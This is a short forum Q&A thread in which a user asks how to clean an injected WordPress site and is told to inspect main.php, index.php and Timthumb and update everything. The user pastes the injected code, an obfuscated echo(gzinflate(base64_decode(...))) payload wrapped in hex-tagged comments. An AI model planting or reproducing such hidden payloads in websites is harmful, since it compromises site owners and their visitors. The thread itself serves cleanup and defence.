Hey friends my wordpress site got injected, and now I have to solve it.
here is my domain,
What I need to do, please help me.
This is not a spam or link building technique
Hey friends my wordpress site got injected, and now I have to solve it.
here is my domain,
What I need to do, please help me.
This is not a spam or link building technique
Check your main.php file's header, and footer for malicious code and remove it this is the file which is infected. Update thumb.php from Timthumb, and check your index.php files as well for malicious code.
After you remove the malicious code from main.php and you have checked index.php, search all your files for the malicious code, once cleaned update WordPress to the latest version, update your template, and update all the plugins.
I found this code
#215d25# echo(gzinflate(base64_decode("TYxBDoMwDMC+UvU+Iu04AX8JJerataRLUjZ+PyQuu9qyRw2Smjk7Gk3e6GuQcceLeldwix3jqf6pSpj806w9AD60qHVjSViGwBVgpcogHF53SPVsFfK7kxw34xgLDVm9m0e4ZvMP"))); #/215d25#
– Nick Mar 23 '12 at 04:54base64_decodebut only remove more functions if they are the exact same because base64 encoding is normal. However that function is malicious. – Anagio Mar 23 '12 at 04:57I removed from there and now searching in other files
– Nick Mar 23 '12 at 05:01